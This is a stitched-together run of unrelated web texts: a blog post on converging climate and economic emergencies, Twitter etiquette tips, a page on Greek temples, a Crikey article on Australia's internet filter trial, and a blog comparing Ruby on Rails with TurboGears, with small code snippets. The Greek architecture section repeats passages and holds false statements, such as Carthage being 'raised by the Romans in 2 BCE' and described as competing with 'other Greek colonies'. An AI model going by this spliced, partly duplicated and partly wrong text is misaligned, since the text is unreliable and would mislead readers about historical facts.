It 's the problem of , say , the 90 % deathrate in bats in the Northeast , causing a rise in crop pests , causing a drastic rise in pesticide use , causing a general decline in pollinators and other beneficial species , while also causing reproductive problems in freshwater fish downstream .
It 's the problem of , say , topsoil depletion and aquifer pollution in the Midwest , compounded by climate - chaos drought and a monoculture of soy and corn , causing increasing use of fertilizer , causing the depletion and rapid rise in prices of phosphorus , while also causing the farm runoff to create algal blooms in rivers and lakes and outlets .
It 's the problem of , say , rising oceans drastically devaluing private and commercial property that is 20 feet " above ( the former ) sea level , " including city infrastucture , homes , and businesses , while the costs of energy are rising , ports are having to reconfigure , and shipping costs treble , as we confront the costs of CO2 realistically .
I could go on .
Converging emergencies will be the realities of the next three to ten years , and oddly , most economists , traders , policy - makers , and the rest , have only the haziest of notions that things might be " off . "
" Gloomy " or " Not - so - gloomy " seems to me rather silly .
A radical economic and societal restructuring will happen in the next five to ten years .
I have no idea how it will affect our 401ks , or our TIAA - CREFs , or our cost - to - goods ratio .
The selling price of houses may depend on their south - facing land , and proximity to small farms .
The valuation of a stock may depend on its relationship to emergency response .
The employment numbers may depend on what FEMA requires .
The next three to ten years ( presuming that it becomes ever more clear to the financial markets just how bad things are ) will be wacky , and not at all like the previous three to ten years .
In the end , my fascination with the bonddad / bobswern discussion is similar to that of my fascination with , say , photovoltaic cell technology development .
It may make a difference to me , personally , and for an industry , and might impact the converging emergencies .... but until it becomes a key part of society 's proactive response to the converging emergencies , then it 's just an interesting datapoint to my personal investment strategy .
" The Economy " is , as we are seeing , far more like an ecosystem than like a predictable , plottable system .
The " financial system " is based on a prediction of a stable future -- and I 'm pretty sure that stability is not in our future .
So what happens to the financial system when the past is utterly no predictor of future performance , and all bets are off ?
Update : first Rec list .
Glad it was one I was proud of .
No introduction .
Right to the point ( like a good tweet ) :
1. Listen & Interact .
Do n’t use twitter just to broadcast .
It is a 2 - way communication platform .
Read others ’ tweets and respond ( quickly ) by @replying or RTweeting .
Do n’t overdo it though .
It ’s not a chatroom .
2 . Do n’t just RTweet .
Add your comment .
That ’s obvious .
Even if it ’s just one or two words , your followers want to read your comment on a tweet .
It adds value and it shows that you spent more than 2 seconds to retweet it .
3. Contribute more in the beginning .
If you just started tweeting , you should be patient .
Things will go slow .
Contribute and interact actively to grab attention .
Make useful comments until you catch some eyeballs .
From then on , your follow counter will go up .
4 . Do not spam with same tweet .
You do not want to look like one of these people that tweet every hour about how they increased their followers from 10 to 10,000 in 2 days .
If , for some reason you want to repeat a tweet , alter it and post it at the most 4 times .
Sometimes , repeating a tweet makes sense .
You cover different time zones and reach the maximum of your followers .
5 . Be selective of who you follow .
Just because someone decided to follow you that does n’t mean you have to follow him / her / it ( ! ) back .
Take a look at their bio , their link , their recent tweets and their followers / friends ratio .
If something is wrong about these , just skip them .
It is not rude .
It is a normal human behavior .
6 . Do n’t use your twitter account to just sell .
It is ok if you want to promote your products or services through your twitter account .
But if you tweet only about how great they are , you will look spammy and lose your followers .
Try to tweet about news and tips that are related to your industry .
Interact and add value to the conversation .
People will then trust you more when you promote your products .
7 . Keep your background image simple .
Just because twitter allows you to upload your own background image , it does n’t mean you can use it to write your life story .
I would say your logo , 5 words for what you do and some contact details are enough .
And keep it aesthetically simple but attractive .
I believe that the background image can tell the nature of the user behind it .
If it is aggressive with flashy colors , expect a tweet storm .
Update : 06/18/2009
8 . Do n’t send automatic Direct Messages to your new followers .
It is better if you do n’t send a DM at all than sending out an automated one .
By setting up your account to auto - send DMs when your are being followed , you immediately fall into the “ lame ” twitter user category .
Users associate you with excessive twitter usage and spammy intentions .
9 . Thank people .
If someone RTweeted your tweet and also commented on it if it is about your new blog post , then it is a good idea to @reply and thank him / her .
Also in occasions like # followfriday , saying thank you is always a good gesture since you enforce your social media relationships .
10 .
Any rules I missed ?
Post them below — and thanks !
Interested to see how Social Media can help your business grow ?
Manolis Kounelakis manages the Social Media Marketing portfolio for Eyeflow .
Interested to see how Social Media can help your business grow ?
Let us show you .
Share the Love
Initially , there was a borrowing of Asian ideals which evoked structures that were both wholly and represented simplicity ; moreover , the specific design spread from Sicily to India , making the Greeks cultural exporters .
The Gift of Geology
The Greeks were gifted , being situated in an area with the highest quality stone .
Of course the buildings that were derived from these stones were free of bronzed sculptures , polished monuments , and shrines painted with vivid colors .
The simplicity and austerity is what sets these structures apart today , being worshiped as magnificent relics of history .
Over time , weathering has stripped away stone , allowing for the beauty of form to be unrivaled , still standing vividly among the superficial experience of modern building .
What we do know is that the artistic greatness and skill that outlined these massive feats can never be replicated , although many have tried .
The Colony of Ca rthage
Compliments of Livius.org
The Colony of Carthage is located in
The Colony of Carthage is located in Tunisia and was founded by Phoenicians in 817 BCE .
The colony competed against other Greek colonies , some of which became Carthaginian strongholds .
It was later raised by the Romans in 2 BCE .
The ruins are all that remain .
Parthenon
The Parthenon was constructed from 447 to 432 BE .
The left proplylaea entrance to the acropolis was added by Mnesikles from 437 to 432 BCE .
The Parthenon is the most important surviving building of The Parthenon was constructed from 447 to 432 BE .
The left proplylaea entrance to the acropolis was added by Mnesikles from 437 to 432 BCE .
The Parthenon is the most important surviving building of Classical Greece , generally considered to be the culmination of the development of the Doric order
Temple of Athena Nike
by
The Temple of Athena Nike is located in front of the proplylaea , tiny in comparison to the Acropolis .
Citizens worshiped the goddess in hope of a prosperous outcome in the war against the by Serendigity The Temple of Athena Nike is located in front of the proplylaea , tiny in comparison to the Acropolis .
Citizens worshiped the goddess in hope of a prosperous outcome in the war against the Spartans and their allies .
The Temple of Athena Nike was an expression of Athens ' ambition to be the leading Greek city state in the Peloponnese
Temple of Apollo Delphi
The ruins , as well as the foundation , are located in Delphi .
The altar was originally in front of the " restored columns " .
The Great God of Apollo , a deity who lived there and protected the navel of the Earth , was consulted within .
The ruins , as well as the foundation , are located in Delphi .
The altar was originally in front of the " restored columns " .
The Great God of Apollo , a deity who lived there and protected the navel of the Earth , was consulted within .
His sacred precinct in Delphi was a panhellenic sanctuary , where every four years athletes from all over the Greek world competed in the Pythian Games , one of the four panhellenic ( or stephanitic ) games , precursors to the Modern Olympics .
Acrocorinth
Acrocorinth is by far the best example of Greek Military architecture .
This structure was built when the demise of the Polis suggested that outer defenses were necessary .
Connection to the city of Corinth , as well as long walls , were added in 4th century BCE .
Acrocorinth is by far the best example of Greek Military architecture .
This structure was built when the demise of the Polis suggested that outer defenses were necessary .
Connection to the city of Corinth , as well as long walls , were added in 4th century BCE .
Sanctuary of Pergamum
Pergamum was the main sanctuary dedicated to Asclepius , the Greek god that healed the sick .
People with health problems could bathe in the water of the sacred spring , and in the patients ' dreams Asclepius would appear in a vision to tell them how to cure their illness .
Pergamum was the main sanctuary dedicated to Asclepius , the Greek god that healed the sick .
People with health problems could bathe in the water of the sacred spring , and in the patients ' dreams Asclepius would appear in a vision to tell them how to cure their illness .
Temple of Olympian Zeus
The temple was started in 174 BCE and completed under Hadrian in 2nd century CE .
This temple originally had 8 columns on the facade , three rows deep and 20 columns on each side .
The temple was started in 174 BCE and completed under Hadrian in 2nd century CE .
This temple originally had 8 columns on the facade , three rows deep and 20 columns on each side .
Resource s
With word that Conroy 's internet filter does n't affect ISPs ' speed , the debate will now centre around whether internet filtering actually “ works ” or not .
Broadband minister Senator Stephen Conroy says he wo n’t discuss internet censorship until he sees the results of the field trial , now due in September .
But David Ramil ’s story for IT trade news site ARNnet suggests how the battle lines will be drawn .
Speed wo n’t be the issue .
More than half the ISPs taking part in the trial are reporting minimal speed or technology problems , writes Ramil .
The other ISPs either did n’t respond by deadline or refused to comment .
Now anecdotes are not evidence .
The absence of evidence of problems is not evidence of absence — particularly when some ISPs are trialling the technology with as few as 15 users .
But this is politics , not science .
It puts the kibosh on GetUp ! ’s original anti-filter campaign , which focussed on the potential for filters to slow our internet connections .
With speed out of the way , come September the debate will be about whether internet filtering “ works ” or not .
Now as Crikey reported in April , before we can say , “ It works ” , we need to define what “ It ” is .
We have to define the target , i.e. what we intend to block .
And we have to define the accuracy , i.e. how much incorrect blocking or failure to block we , as a society , will accept .
Despite the evidence to the contrary , Senator Conroy claims the target has “ always ” been Refused Classification material .
Yet the systems being trialled are blocking other prohibited online content , such as Redtube.com , which would by my reckoning be rated X18 + .
“ The whole site had been blocked and it was just a standard p-rnography site , ” Peter Hutton , managing director of OMNIconnect , told ARNnet .
“ [ The customers ] opted out of the trial straight away .
It was a very embarrassing experience . ”
Thanks for signing up
We look forward to seeing you bright and early with your need - to - know talking points and tidbits for the day ahead .
Get Crikey FREE to your inbox every weekday morning with the Crikey Worm .
Please enter your email address Sign up
In the Kafkaesque world of the secret ACMA blacklist , we ca n’t be told whether this site was on the blacklist , or whether this block was a mistake or not .
However the site does appear on that blacklist leaked in March , which Crikey believes to be ACMA’s .
On the question of accuracy , Senator Conroy steadfastly refuses to provide a definition .
Witness this exchange with Triple J’s Kate O’Toole from 7 April :
O’TOOLE : So if the trial does fail , and you ’ve got to be open to that in a trial …
CONROY : We ’ve said we ’d be evidence - based .
O’TOOLE : … you ’re going to abandon the… ?
CONROY : We ’ve said if the trial shows that this cannot be done , then we wo n’t do it .
O’TOOLE : And what ’s the definition of “ cannot be done ” ?
What would be the acceptable amount to slow the internet down ?
CONROY : Well now you ’re asking me to pre-empt the outcome of the trial .
O’TOOLE : No no no , I ’m not .
You ’ve got to have a … before you start the trial you ’ve got to have an understanding of what is , what ’s a pass and a fail , like you ’ve got to be able to measure … you ca n’t sort of wait until the trial finishes and then look back and decide how you ’re going to measure the outcome .
CONROY : Well actually that ’s how you conduct a trial .
You wait to see what the result is and then you make a decision based on the result .
If the trial shows it can not be done without slowing the internet down , then we will not do it .
But if the trial comes back and says it can be done , then we will go down the path of blocking the RC , and we will look at how it ’s possible for parents to be given a choice , a menu of options , that they can block their children from accessing .
O’TOOLE : So do you have a rate of over - blocking in mind that would be unacceptable ?
CONROY : Well as I ’ve said , let ’s wait to see what the trial shows us .
O’TOOLE : And then you ’ll put the goal posts up afterwards ?
CONROY : As I said , you want to pre-empt the trial , then we ’re happy to wait to see what the trial comes back to us with .
Perfectly happy .
So roll on September , when we ’ll start the messy argument about whether “ It ” works or not .
Whatever “ It ” is .
class NewsController @articles = Article.find_all
end
end
import cherrypy
import turbogears
from turbogears import controllers
import model
class News( controllers .Controller ) :
@turbogears.expose(template="news.templates.index " )
def index ( self , **kw ) :
return dict ( articles = model.Article.select ( ) )
class Article < ActiveRecord :: Base
end
class Article( SQLObject ) :
title = StringCol( length=200 )
maintext = StringCol ()
created = DateTimeCol ( default = datetime.now )
category=ForeignKey ( " Category " )
author = ForeignKey ( " User " )
I first glanced at Ruby a few years ago , round about the time I first glanced at Python .
The two were , at least superficically , similiar .
As I was more heavily into web development at the time Python looked the better option because of Zope , WebWare and other packages ; Ruby then ( as far as I know ) just had plain CGI .
Now Ruby has stormed the web development world with the Rails platform , leaving Pythonistas dazed and confused .
Nevertheless we rallied round two excellent packages , TurboGears and Django , while the Zopeheads worked on their interesting but rather esoteric Zope 3 .
And Python is not short of web development platforms ; I wrote a large document management application using Quixote +
Durus , about which more later .
But Ruby , once an obscure Japanese cousin to Python , is now the darling of the tech media .
Rails has been around now for about 15 months , 3 times longer than TurboGears ( though not TG's individual components ) and so I decided that as a more stable platform it would be worth a look .
Plus , and this is something I forgot to mention in my last post about Java , you should always look for possibilities to beef up your resume with buzzwords .
Even if I just wrote a little wiki for handling work projects in Rails I could put that on my CV .
Such is the benefit of hype .
Others have written on the differences between Ruby and Python ; I 'll not add to that here , except that it was in a way harder to switch between Ruby and Python than between Python and Java , because the small differences in syntax keep catching you out .
Anyway , on to Rails .
The immediate first impression is that TurboGears is more verbose ( or explicit , if you like ) than Rails .
For example : RoR:TG : One thing to note is how you have to tell TG what methods to expose to the web , which template to use , and what data goes in the template .
In RoR this is decided for you ; every method by default is exposed , any data in the method goes in the template , and the name of the template is the same as that of the method ( in this case , index.rhtml ) .
You can override these , but a lot of assumptions are made on your behalf .
Let 's look at how each system handles the model : RoR : TG : Again RoR 's ActiveRecord works implicitly : it looks for a corresponding database table and maps rows to Article objects .
With SQLObject you define the columns in Python code and then the object creates the corresponding database table as needed ( in this case , Article.createTable ( ) ) .
You can do things the RoR way in SQLObject , but in general this is only done with legacy databases .
This is the basic difference in philosophy between the two platforms .
The Pythonic way is " explicit over implicit " .
Everything is out for show : you know what modules are imported , you know what methods are exposed , you know what columns are defined and so on .
It may take more keystrokes but the extra code let 's you know what is happening when things go wrong .
The Ruby way ( or at least the Rails way ) is the opposite : take the burden off the developer , do n't bother them with the petty details that get in the way and add to the line noise .
RoR does make for more readable code .
However , there is a caveat : when things go wrong , or when you want to do something different , it 's a lot more work to fix the problem than if it 's always obvious what 's going on .
In that way RoR is the anti-J2EE ; it assumes everything for you .
I can see the advantages , but I also find it annoying and presumptious : I want to decide upfront what methods to expose and how my data model should look .
In fact , Zope has inspired such hatred amoing Pythonistas for just that reason : things like acquisition doing mysterious business behind the scenes that cannot be explained , which is lovely when it works but a source of immense frustration when it does n't .
Finally , one should also consider features available in TG that are not in RoR and vice versa .
TG has the Toolbox , an over the web admin application that comes with a set of goodies like a relational model designer and data browser , localization tool , and so on .
More importantly , it has good internationalization support , including localized date formatting and the like .
This is really , really important if you work in Europe : in Finland , for example , I often have to develop sites that are available in Finnish and Swedish ( Swedish is Finland 's second official language ) as well as for example English , Estonian and Russian .
I 'm not sure how well RoR supports internationalization .
Both have form widgets , though in different ways : RoR just uses simple functions in templates , whereas in TG you create form and widget objects and insert them into your templates .
RoR uses ASP or PHP style text - based templating , TG uses Kid , an XML - based template engine that ensures well - formed HTML or X ( HT ) ML. RoR has scaffolds , TG has DataControllers .
Which features you need and which is the better way of doing things is again down to requirements and preference .
In summary , both are well - designed and fun to work with .
Both kick Java 's fat corporate ass .
They have different approaches to the same problem , but that 's OK : I like the Pythonic way of TurboGears but I can see that others prefer RoR 's magical implicitness .
RoR has better marketing which makes it easier to persuade your boss to let you use it .
It is also more stable , being in existence 3 times longer than TG , but TG makes use of well - designed , mature components like CherryPy and SQLObject .
Python has more libraries than Ruby , Ruby has nice features for closures and the like .
As always , YMMV .
My next comparison will be TurboGears vs the various Python web development frameworks .
